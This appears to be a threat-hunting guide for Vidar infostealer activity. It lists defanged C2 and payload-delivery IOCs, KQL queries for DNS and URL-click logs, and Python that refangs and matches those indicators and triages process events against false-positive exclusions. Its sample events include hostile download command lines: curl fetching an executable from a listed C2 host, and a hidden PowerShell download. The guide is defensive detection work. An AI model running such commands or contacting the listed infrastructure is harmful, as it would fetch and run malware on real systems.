This hunt hypothesis targets potential Vidar malware activity by searching for the indicators of compromise below, which are associated with Vidar's credential theft and data exfiltration. SOC teams should proactively hunt for this activity in Azure Sentinel so that advanced persistent threats are identified and mitigated before significant data loss occurs.
IOC Summary

Malware Family: Vidar
Total IOCs: 11
IOC Types: url, domain
| Type | Value | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| url | hxxps://jumpthehurdle.com/ | payload_delivery | 2026-05-22 | 75% |
| url | hxxps://pfo.fbvendas.com/ | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://pfo.adasm188.top/ | botnet_cc | 2026-05-22 | 100% |
| domain | pfo.fbvendas.com | botnet_cc | 2026-05-22 | 100% |
| domain | pfo.adasm188.top | botnet_cc | 2026-05-22 | 100% |
| domain | hms.xybcaap.my.id | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://hms.xybcaap.my.id/ | botnet_cc | 2026-05-22 | 100% |
| domain | mal.fbvendas.com | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://mal.fbvendas.com/ | botnet_cc | 2026-05-22 | 100% |
| domain | mal.adasm188.top | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://mal.adasm188.top/ | botnet_cc | 2026-05-22 | 100% |
```kql
// Hunt for DNS queries to known malicious domains
// Source: ThreatFox - Vidar
// has_any matches whole terms, so subdomains of the listed hosts are also returned
let malicious_domains = dynamic(["pfo.fbvendas.com", "pfo.adasm188.top", "hms.xybcaap.my.id", "mal.fbvendas.com", "mal.adasm188.top"]);
DnsEvents
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc
```

```kql
// Hunt for access to known malicious URLs
// Source: ThreatFox - Vidar
// UrlClickEvents only records clicks evaluated by Safe Links, so this covers
// mail and Teams links, not arbitrary browser traffic
let malicious_urls = dynamic(["https://jumpthehurdle.com/", "https://pfo.fbvendas.com/", "https://pfo.adasm188.top/", "https://hms.xybcaap.my.id/", "https://mal.fbvendas.com/", "https://mal.adasm188.top/"]);
UrlClickEvents
| where Url has_any (malicious_urls)
| project Timestamp, AccountUpn, Url, ActionType, IsClickedThrough
| order by Timestamp desc
```
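The two KQL hunts above depend on the IOC table being refanged (hxxps to https) and on matching hostnames rather than raw substrings. The following Python is an added example, not code from the hunt page or from ThreatFox: it refangs the published IOCs, collapses the url and domain rows into one host set, and runs the same two checks over constructed DnsEvents and UrlClickEvents records. The sample events, computer names and user principal names are constructed for the example; matching treats a subdomain of a listed host as a hit but not a lookalike such as notpfo.fbvendas.com.

```python
"""Refang the IOCs from the hunt table and match them against constructed DNS
and URL-click events (added example; not part of the original hunt page)."""
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# IOC values as published in the table above (defanged with hxxps).
RAW_IOCS: List[Tuple[str, str]] = [
    ("url", "hxxps://jumpthehurdle.com/"),
    ("url", "hxxps://pfo.fbvendas.com/"),
    ("url", "hxxps://pfo.adasm188.top/"),
    ("domain", "pfo.fbvendas.com"),
    ("domain", "pfo.adasm188.top"),
    ("domain", "hms.xybcaap.my.id"),
    ("url", "hxxps://hms.xybcaap.my.id/"),
    ("domain", "mal.fbvendas.com"),
    ("url", "hxxps://mal.fbvendas.com/"),
    ("domain", "mal.adasm188.top"),
    ("url", "hxxps://mal.adasm188.top/"),
]


def refang(value: str) -> str:
    """Undo common defanging (hxxp -> http, [.] -> .) so the indicator matches live telemetry."""
    value = re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)
    return value.replace("[.]", ".").replace("(.)", ".")


def ioc_hosts(iocs: Iterable[Tuple[str, str]]) -> Set[str]:
    """Collapse url and domain indicators into one set of lowercase hostnames."""
    hosts: Set[str] = set()
    for kind, value in iocs:
        live = refang(value)
        host = urlsplit(live).hostname if kind == "url" else live
        if host:
            hosts.add(host.lower().rstrip("."))
    return hosts


def host_matches(host: str, bad_hosts: Set[str]) -> Optional[str]:
    """Return the indicator hit by `host`: the host itself or any parent label chain
    (cdn.pfo.adasm188.top hits pfo.adasm188.top), never a plain substring
    (notpfo.fbvendas.com does not hit pfo.fbvendas.com)."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in bad_hosts:
            return candidate
    return None


def hunt(dns_events: List[Dict[str, str]], url_events: List[Dict[str, str]],
         iocs: Iterable[Tuple[str, str]] = RAW_IOCS) -> List[Dict[str, str]]:
    """Mirror the two KQL hunts: DNS query names and clicked URL hosts against the IOC set."""
    bad = ioc_hosts(iocs)
    hits: List[Dict[str, str]] = []
    for ev in dns_events:
        ioc = host_matches(ev["Name"], bad)
        if ioc:
            hits.append({"Source": "DnsEvents", "Entity": ev["Computer"],
                         "Observed": ev["Name"], "Indicator": ioc})
    for ev in url_events:
        ioc = host_matches(urlsplit(ev["Url"]).hostname or "", bad)
        if ioc:
            hits.append({"Source": "UrlClickEvents", "Entity": ev["AccountUpn"],
                         "Observed": ev["Url"], "Indicator": ioc})
    return hits


# Constructed sample telemetry (not real data): two true hits per source, plus lookalikes.
SAMPLE_DNS = [
    {"Computer": "WS-01", "Name": "pfo.fbvendas.com"},
    {"Computer": "WS-02", "Name": "cdn.pfo.adasm188.top"},
    {"Computer": "WS-03", "Name": "notpfo.fbvendas.com"},
    {"Computer": "WS-04", "Name": "updates.example.com"},
]
SAMPLE_CLICKS = [
    {"AccountUpn": "alice@corp.example", "Url": "https://jumpthehurdle.com/login"},
    {"AccountUpn": "bob@corp.example", "Url": "https://mal.adasm188.top/dl/setup.exe"},
    {"AccountUpn": "carol@corp.example", "Url": "https://example.com/docs"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_DNS, SAMPLE_CLICKS):
        print(hit)
```

Note that deriving the host set from the whole table yields six hosts, including jumpthehurdle.com from the payload_delivery URL row; the DNS query above lists only the five botnet_cc domains, so a DNS hunt built from the table directly would also cover the delivery host.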
| Sentinel Table | Notes |
|---|---|
| DnsEvents | Ensure this data connector is enabled |
| UrlClickEvents | Ensure this data connector is enabled |
| Scenario | Description | Filter/Exclusion |
|---|---|---|
| Scheduled System Maintenance Task | A legitimate scheduled task runs a script that uses curl or wget to download updates from a trusted internal repository. | Exclude processes initiated by schtasks.exe or tasks with a known name like UpdateCheckTask. |
| Admin Using PowerShell for Remote Management | An administrator uses PowerShell to remotely manage a server, which may involve downloading temporary files or scripts from a trusted internal server. | Exclude processes initiated by powershell.exe with a command line containing -Command or -File and a known admin script path. |
| Log Collection via WinSCP | A system administrator uses WinSCP to transfer log files from a remote server to a central logging server. | Exclude processes initiated by winscp.exe or with a command line containing scp or sftp and a known log transfer script. |
| Software Update via Chocolatey | A package manager like Chocolatey is used to install or update software, which may involve downloading packages from a trusted internal feed. | Exclude processes initiated by choco.exe or with a command line containing install or update and a known internal package source. |
| Internal Monitoring Tool Data Exfiltration | A legitimate internal monitoring tool (e.g., Nagios, Zabbix) sends metrics or logs to a central monitoring server. | Exclude processes initiated by the monitoring tool's service or with a command line containing the tool's known executable name and internal server IP. |
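An exclusion that keys only on the process name (curl.exe under schtasks.exe, say) would also suppress a scheduled task that has been repointed at an attacker host, so each of the scenarios above is only safe when its filter is paired with the trusted internal destination its description mentions. The Python below is an added example, not code from the hunt page: it encodes the five exclusions as predicates over a minimal process-event record, each combined with a destination check, and triages constructed events into "excluded" or "review". The event schema, the internal host names, the admin script directory and the sample command lines are assumptions made for the example; the one external destination used is an IOC domain from the table above.

```python
"""Evaluate the false-positive exclusions against constructed process events
(added example; not from the original hunt page)."""
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class ProcEvent:
    process: str      # image name of the process that made the network request
    parent: str       # image name of the parent process
    cmdline: str      # full command line
    remote_host: str  # host the process connected to


# Placeholder internal hosts and paths (assumptions); substitute your own environment's values.
TRUSTED_INTERNAL_HOSTS = {"repo.corp.example", "packages.corp.example",
                          "logs.corp.example", "monitor.corp.example"}
ADMIN_SCRIPT_DIR = "c:\\admin\\scripts\\"
DOWNLOADERS = {"curl.exe", "wget.exe"}
MONITORING_EXES = {"nagios.exe", "zabbix_agentd.exe"}


def internal(ev: ProcEvent) -> bool:
    """True when the destination is one of the trusted internal servers."""
    return ev.remote_host.lower() in TRUSTED_INTERNAL_HOSTS


def cmd(ev: ProcEvent) -> str:
    return ev.cmdline.lower()


# Each exclusion pairs the page's filter with the internal-destination condition
# its description implies, so a known tool reaching an unknown host is still reviewed.
EXCLUSIONS: Dict[str, Callable[[ProcEvent], bool]] = {
    "Scheduled System Maintenance Task": lambda ev: ev.process in DOWNLOADERS
        and (ev.parent == "schtasks.exe" or "updatechecktask" in cmd(ev)) and internal(ev),
    "Admin Using PowerShell for Remote Management": lambda ev: ev.process == "powershell.exe"
        and ("-command" in cmd(ev) or "-file" in cmd(ev))
        and ADMIN_SCRIPT_DIR in cmd(ev) and internal(ev),
    "Log Collection via WinSCP": lambda ev:
        (ev.process == "winscp.exe" or " scp " in f" {cmd(ev)} " or "sftp" in cmd(ev))
        and ADMIN_SCRIPT_DIR in cmd(ev) and internal(ev),
    "Software Update via Chocolatey": lambda ev: ev.process == "choco.exe"
        and ("install" in cmd(ev) or "update" in cmd(ev)) and internal(ev),
    "Internal Monitoring Tool Data Exfiltration": lambda ev:
        (ev.process in MONITORING_EXES or any(name in cmd(ev) for name in MONITORING_EXES))
        and internal(ev),
}


def triage(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Label each event with the exclusion that suppresses it, or 'review' if none applies."""
    results: List[Dict[str, str]] = []
    for ev in events:
        matched = next((name for name, rule in EXCLUSIONS.items() if rule(ev)), None)
        results.append({"process": ev.process, "remote_host": ev.remote_host,
                        "verdict": f"excluded: {matched}" if matched else "review"})
    return results


# Constructed sample events (not real telemetry). Events 2 and 4 share a process and
# parent with legitimate activity but reach non-internal hosts, so they stay in review.
SAMPLE_EVENTS = [
    ProcEvent("curl.exe", "schtasks.exe",
              "curl.exe -o c:\\updates\\patch.zip https://repo.corp.example/patch.zip",
              "repo.corp.example"),
    ProcEvent("curl.exe", "schtasks.exe",
              "curl.exe -o c:\\users\\public\\x.exe https://mal.adasm188.top/",
              "mal.adasm188.top"),
    ProcEvent("powershell.exe", "explorer.exe",
              "powershell.exe -File c:\\admin\\scripts\\patch.ps1", "packages.corp.example"),
    ProcEvent("powershell.exe", "winword.exe",
              "powershell.exe -nop -w hidden -Command iwr https://203.0.113.10/a", "203.0.113.10"),
    ProcEvent("choco.exe", "cmd.exe",
              "choco install git -s https://packages.corp.example/nuget", "packages.corp.example"),
    ProcEvent("winscp.exe", "cmd.exe",
              "winscp.exe /script=c:\\admin\\scripts\\logxfer.txt", "logs.corp.example"),
    ProcEvent("zabbix_agentd.exe", "services.exe",
              "zabbix_agentd.exe -c c:\\zabbix\\zabbix_agentd.conf", "monitor.corp.example"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

The WinSCP rule matches scp only as a whole word, because a bare substring test would also be satisfied by winscp.exe itself and by any command line that merely mentions the tool.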